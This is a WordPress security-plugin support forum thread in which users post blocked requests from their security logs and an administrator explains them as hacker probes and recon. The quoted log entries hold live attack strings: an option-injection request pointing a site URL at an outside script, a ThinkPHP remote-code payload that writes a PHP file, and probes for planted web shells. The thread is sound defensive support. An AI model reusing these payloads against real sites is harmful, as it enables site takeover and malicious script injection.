Security Log Event Codes

[Bub]

Done and done…. Thanks. This topic should now be closed.

[Bub]

Again, thanks.

[sergeykar]

I have been seeing this frequently in my security log – and it appears like a hack attempt – not sure what it is because I have not seen this in the past. It appears BPS is doing it’s job – however is there a weakness this attempt is trying to exploit?

[403 GET Request: 06.08.2019 - 10:15]
BPS: 3.5
WP: 5.2.2
Event Code: WPADMIN-SBR
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: 159.69.154.78
Host Name: static.78.154.69.159.clients.your-server.de
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-admin/admin-ajax.php?nd_options_value_import_settings=siteurl[nd_options_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_options_end_option]
QUERY_STRING: nd_options_value_import_settings=siteurl[nd_options_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_options_end_option]
HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36

[AITpro Admin]

This is either a probe looking for existing injected hacker code in your website’s Source Code or a hacker trying to exploit an existing hack injection on your website’s Source Code.  To check if your website is hacked do the steps below:

1. Go to your website’s home page.
2. Right mouse click and click View page source (google chrome) or a similar command for other Browsers.
3. Use your Browser’s Find… command (google chrome – located under settings > Find…) and enter this search string:  nd_options
4. If you see/find Source Code that looks like this below then your website is hacked.
5. Let me know if your Browser Find/Search finds any search results or not.

httx://expat.ca/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=jfjvc.php&vars%5B1%5D%5B%5D=%3C?php%20mb_ereg_replace(, httx://expat.ca/jfjvc.php, httx://expat.ca/wp-admin/admin-ajax.php?nd_options_value_import_settings=siteurl[nd_options_option_value]httxs://jackielovedogs.com/pret.js?l=1&[nd_options_end_option], httx://expat.ca/wp-admin/admin-post.phpnd_options_value_import_settings=home[nd_options_option_value]httxs://jackielovedogs.com/pret?l=1&[nd_options_end_option],

[Chris Moon]

Found this in my Security Log and not sure what it mens:

[403 GET Request: September 19, 2020 - 23:57]
BPS Pro: 14.8
WP: 5.5.1
Event Code: PFWR-PSBR-HPRA
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: GDPR Compliance On
Host Name: ns4.transcomag.net
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP: GDPR Compliance On
HTTP_FORWARDED: GDPR Compliance On
HTTP_X_FORWARDED_FOR: GDPR Compliance On
HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/n.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla

[403 GET Request: September 19, 2020 - 23:57]
BPS Pro: 14.8
WP: 5.5.1
Event Code: PFWR-PSBR-HPRA
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: GDPR Compliance On
Host Name: ns4.transcomag.net
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP: GDPR Compliance On
HTTP_FORWARDED: GDPR Compliance On
HTTP_X_FORWARDED_FOR: GDPR Compliance On
HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/accesson.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla

[403 GET Request: September 19, 2020 - 23:57]
BPS Pro: 14.8
WP: 5.5.1
Event Code: PFWR-PSBR-HPRA
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: GDPR Compliance On
Host Name: ns4.transcomag.net
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP: GDPR Compliance On
HTTP_FORWARDED: GDPR Compliance On
HTTP_X_FORWARDED_FOR: GDPR Compliance On
HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/upload.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla

[403 GET Request: September 19, 2020 - 23:57]
BPS Pro: 14.8
WP: 5.5.1
Event Code: PFWR-PSBR-HPRA
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: GDPR Compliance On
Host Name: ns4.transcomag.net
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP: GDPR Compliance On
HTTP_FORWARDED: GDPR Compliance On
HTTP_X_FORWARDED_FOR: GDPR Compliance On
HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/thumbs.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla

[403 GET Request: September 19, 2020 - 23:57]
BPS Pro: 14.8
WP: 5.5.1
Event Code: PFWR-PSBR-HPRA
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: GDPR Compliance On
Host Name: ns4.transcomag.net
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP: GDPR Compliance On
HTTP_FORWARDED: GDPR Compliance On
HTTP_X_FORWARDED_FOR: GDPR Compliance On
HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/x.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla

[403 GET Request: September 19, 2020 - 23:57]
BPS Pro: 14.8
WP: 5.5.1
Event Code: PFWR-PSBR-HPRA
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: GDPR Compliance On
Host Name: ns4.transcomag.net
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP: GDPR Compliance On
HTTP_FORWARDED: GDPR Compliance On
HTTP_X_FORWARDED_FOR: GDPR Compliance On
HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-content/plugins/quiz-master-next/js/admin.js
QUERY_STRING:
HTTP_USER_AGENT: Mozilla

[AITpro Admin]

@ Chris Moon – These are typical hacker recon/searches for known plugins with security vulnerabilities.  The BPS Pro Plugin Firewall protects all plugin files in the WordPress /plugins/ folder.  So these recons/searches were blocked by the BPS Pro Plugin Firewall.

[Chris Moon]

Thanks Ed, that’s reassuring.

[Author]

Posts